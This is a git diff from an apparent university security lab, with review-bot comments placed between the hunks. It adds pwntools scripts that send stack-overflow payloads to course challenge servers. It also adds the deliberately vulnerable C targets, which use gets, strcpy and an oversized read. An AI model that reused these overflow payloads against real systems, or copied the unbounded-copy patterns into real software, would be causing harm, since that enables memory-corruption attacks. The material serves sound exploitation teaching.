diff --git a/pa/.gitignore b/pa/.gitignore
index 885bc07..d07f821 100644
--- a/pa/.gitignore
+++ b/pa/.gitignore
@@ -1,2 +1,3 @@
 **.vscode/
 **__pycache__/
+**.gdb_history
diff --git a/pa/lab6/chall_calling_functions.py b/pa/lab6/chall_calling_functions.py
new file mode 100644
index 0000000..1bf8a16
--- /dev/null
+++ b/pa/lab6/chall_calling_functions.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25153
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_match_an_exact_value.py b/pa/lab6/chall_match_an_exact_value.py
new file mode 100644
index 0000000..fa4088e
--- /dev/null
+++ b/pa/lab6/chall_match_an_exact_value.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25152
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*64 + b"dcba\n")
+conn.interactive()
diff --git a/pa/lab6/chall_return_address.py b/pa/lab6/chall_return_address.py
new file mode 100644
index 0000000..ffbf47e
--- /dev/null
+++ b/pa/lab6/chall_return_address.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25154
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("'\n")
+conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_simple_overflow.py b/pa/lab6/chall_simple_overflow.py
new file mode 100644
index 0000000..cb99bd9
--- /dev/null
+++ b/pa/lab6/chall_simple_overflow.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25151
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("0.\n")
+conn.send(b"\x55"*128 + b"\x01\n")
+conn.interactive()
diff --git a/pa/lab6/chall_super_secure_lottery.py b/pa/lab6/chall_super_secure_lottery.py
new file mode 100644
index 0000000..ac0dde6
--- /dev/null
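Review bot: `WIN_ADDR` in chall_calling_functions.py is assigned but never used; the `conn.send(...)` line re-spells the same four bytes as a literal, so the constant and the payload can silently drift apart. `p32(WIN_ADDR)` (in scope via `from pwn import *`, and already how chall_super_secure_system.py builds its values) states it once, and chall_return_address.py carries the identical dead constant. Separately, `conn.recvuntil("?\n")` passes a `str`; recent pwntools releases accept that only by implicitly ASCII-encoding it and emitting a BytesWarning, so it should be `conn.recvuntil(b"?\n")`, the bytes form the lottery script already uses with `b":"`. The same str-argument issue is in the `recvuntil` calls of chall_match_an_exact_value.py, chall_return_address.py and chall_simple_overflow.py.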
+++ b/pa/lab6/chall_super_secure_lottery.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25161
+
+conn = remote(HOST, PORT)
+conn.recvuntil(b":")
+pl = b"\x55"*(64)
+conn.send(pl)
+print(conn.recvline())
diff --git a/pa/lab6/chall_super_secure_system.py b/pa/lab6/chall_super_secure_system.py
new file mode 100644
index 0000000..e987988
--- /dev/null
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab6/check b/pa/lab6/check
new file mode 100755
index 0000000..002c2eb
Binary files /dev/null and b/pa/lab6/check differ
diff --git a/pa/lab6/check.c b/pa/lab6/check.c
new file mode 100644
index 0000000..969ebcb
--- /dev/null
+++ b/pa/lab6/check.c
@@ -0,0 +1,30 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int check_password(char* password) {
+ char buffer[32];
+
+ strcpy(buffer, password);
+
+ if(strcmp(buffer, getflag()) == 0)
+ return 1;
+
+ return 0;
+}
+
+int main() {
+ init();
+
+ char pass[64] = {0};
+ // we know how to make this secure. No gets in here.
+ read(0, pass, 63);
+
+ if(check_password(pass)){
+ printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+ } else {
+ printf("Unauthorized user/passwd\n");
+ }
+}
diff --git a/pa/lab6/functions b/pa/lab6/functions
new file mode 100644
index 0000000..0ad9bfb
Binary files /dev/null and b/pa/lab6/functions differ
diff --git a/pa/lab6/functions.c b/pa/lab6/functions.c
new file mode 100644
index 0000000..9603c36
--- /dev/null
+++ b/pa/lab6/functions.c
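Review bot: The bare `input()` in chall_super_secure_system.py blocks before `conn.send(pl)` until someone presses Enter, with no prompt saying why; it looks like a debugger-attach pause that belongs with the commented-out `#conn = process("./check")` line above it, and against the remote host it only stalls the run. Either delete both lines or make them opt-in, e.g. `conn = process("./check") if args.LOCAL else remote(HOST, PORT)` followed by `if args.LOCAL: input("attach a debugger, then press Enter")`. Commented-out code should not be committed; the `args` toggle keeps the local path usable without it.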
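Review bot: `strcpy(buffer, password)` in `check_password` copies into `char buffer[32]` with no length check, while `main` passes a `pass` that `read(0, pass, 63)` may have filled with up to 63 bytes, so the copy can overrun the destination. The comment in `main` says this is the secure variant because there is no `gets`, but the unbounded copy one call down undoes that; a bounded form is `if (strlen(password) >= sizeof buffer) return 0;` before the copy, or `snprintf(buffer, sizeof buffer, "%s", password);`. If this file is the reference copy of a deliberately vulnerable lab target, that intent should be stated in a comment next to the `strcpy` so the overrun is not mistaken for an oversight. The return value of `read` is also unchecked; `pass` is zero-initialized so the string stays terminated, but a failed read silently proceeds with an empty password.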
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+void win() {
+ printf("Congratulations, you win!!! You successfully changed the code flow\n");
+ printf("Flag: %s\n", getflag());
+}
+
+int main() {
+ init();
+ int (*fp)();
+ char buffer[32];
+
+ fp = 0;
+
+ printf("You win this game if you are able to call the function win. Can you do it?\n");
+
+ gets(buffer);
+
+ if(fp) {
+ printf("Calling function pointer... jumping to %p\n", fp);
+ fp();
+ }
+}
diff --git a/pa/lab6/lottery b/pa/lab6/lottery
new file mode 100755
index 0000000..626d1c0
Binary files /dev/null and b/pa/lab6/lottery differ
diff --git a/pa/lab6/lottery.c b/pa/lab6/lottery.c
new file mode 100644
index 0000000..3b9cded
--- /dev/null
+++ b/pa/lab6/lottery.c
@@ -0,0 +1,37 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "general.h"
+
+#define GUESS_SIZE 64
+#define LOTTERY_LEN 8
+
+void run_lottery(const char* prize) {
+ char guess[LOTTERY_LEN] = {0};
+
+ while (1) {
+ printf("What is your guess: ");
+ read(0, guess, GUESS_SIZE);
+
+ if (!memcmp(prize, guess, LOTTERY_LEN)) {
+ printf("Congratulations! You won the lottery: %s\n", getflag());
+ } else {
+ puts("Wrong guess. Do you want to play again?");
+ }
+ }
+}
+
+int main() {
+ init();
+ char lottery[LOTTERY_LEN];
+
+ int fd = open("/dev/urandom", O_RDONLY);
+ read(fd, lottery, LOTTERY_LEN);
+ close(fd);
+
+ run_lottery(lottery);
+}
diff --git a/pa/lab6/match.c b/pa/lab6/match.c
new file mode 100644
index 0000000..c81ef9f
--- /dev/null
+++ b/pa/lab6/match.c
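Review bot: `gets(buffer)` in `main` of functions.c reads an unbounded line into `char buffer[32]`; `gets` takes no length and was removed from C11, so any current toolchain at least warns on it. The bounded replacement is `fgets(buffer, sizeof buffer, stdin);` (which, unlike `gets`, keeps the trailing newline). The same call is in match.c (`buffer[64]`), return.c (`buffer[10]` in `challenge`) and simple.c (`buffer[128]`); if these are committed verbatim as the lab's intentionally vulnerable targets, a comment such as `// intentionally unbounded: this is the lab's overflow target` next to each `gets` records that so a later static-analysis run or cleanup does not "fix" them. Minor: `printf("... %p\n", fp)` passes a function pointer to `%p`, which expects `void *`; `(void *)fp` is the portable spelling.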
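Review bot: `main` in lottery.c never checks `open("/dev/urandom", O_RDONLY)` or the `read` that fills `lottery`, so if either fails the game runs against uninitialized stack bytes and `close(-1)` is called; `if (fd < 0 || read(fd, lottery, LOTTERY_LEN) != LOTTERY_LEN) { perror("/dev/urandom"); return 1; }` covers both. In `run_lottery`, `read(0, guess, GUESS_SIZE)` reads up to 64 bytes into `char guess[LOTTERY_LEN]`, an 8-byte array, which is presumably the deliberate flaw of this challenge; the bounded form is `read(0, guess, sizeof guess)`, and a comment marking the mismatch as intentional keeps it from being corrected by accident. The `while (1)` loop also has no exit, so a correct guess prints the flag and immediately prompts again, and because the stdin `read` result is ignored, EOF keeps the loop printing the prompt forever.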
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int main() {
+ init();
+ int test;
+ char buffer[64];
+
+ printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+
+ test = 0;
+ gets(buffer);
+
+ if (test == 0x61626364) {
+ printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+ printf("Flag: %s\n", getflag());
+ } else {
+ printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+ }
+}
diff --git a/pa/lab6/return b/pa/lab6/return
new file mode 100644
index 0000000..b6e2617
Binary files /dev/null and b/pa/lab6/return differ
diff --git a/pa/lab6/return.c b/pa/lab6/return.c
new file mode 100644
index 0000000..2297db0
--- /dev/null
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+void win() {
+ printf("Congratulations, you win!!! You successfully changed the code flow\n");
+ printf("Flag, %s\n", getflag());
+}
+
+void challenge() {
+ char buffer[10];
+ printf("You win this game if you are able to call the function win.'\n");
+ gets(buffer);
+}
+
+int main() {
+ init();
+ challenge();
+ return 0;
+}
diff --git a/pa/lab6/simple b/pa/lab6/simple
new file mode 100755
index 0000000..99a5b92
Binary files /dev/null and b/pa/lab6/simple differ
diff --git a/pa/lab6/simple.c b/pa/lab6/simple.c
new file mode 100644
index 0000000..f3d81d4
--- /dev/null
+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int main() {
+ init();
+ int test;
+ char buffer[128];
+
+ printf("You win this game if you change variable test to a value different from 0.\n");
+
+ test = 0;
+ gets(buffer);
+
+ if(test != 0) {
+ printf("YOU WIN!\n");
+ printf("Flag: %s\n", getflag());
+ } else {
+ printf("Try again...\n");
+ }
+}
diff --git a/pa/writeups b/pa/writeups
index 6b92b0e..03cdb0c 160000
--- a/pa/writeups
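Review bot: The prompt in `challenge()` of return.c ends with a stray `'` before the newline, and `win` prints `"Flag, %s\n"` where functions.c, match.c and simple.c print `"Flag: %s\n"`; both read as typos. The apostrophe, however, is exactly what chall_return_address.py synchronizes on with `conn.recvuntil("'\n")`, so correcting the string (or the copy the server runs, if this is it) without changing the script would leave that receive blocking indefinitely. Whichever is kept, the coupling should be visible: a comment `// NOTE: chall_return_address.py waits for this trailing quote` on the printf line, or the equivalent on the script's recvuntil line.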
+++ b/pa/writeups
@@ -1 +1 @@
-Subproject commit 6b92b0e9830770b3a35cd976e2fe411cee446933
+Subproject commit 03cdb0cdff344cedc119bdbeacb1e811b663b018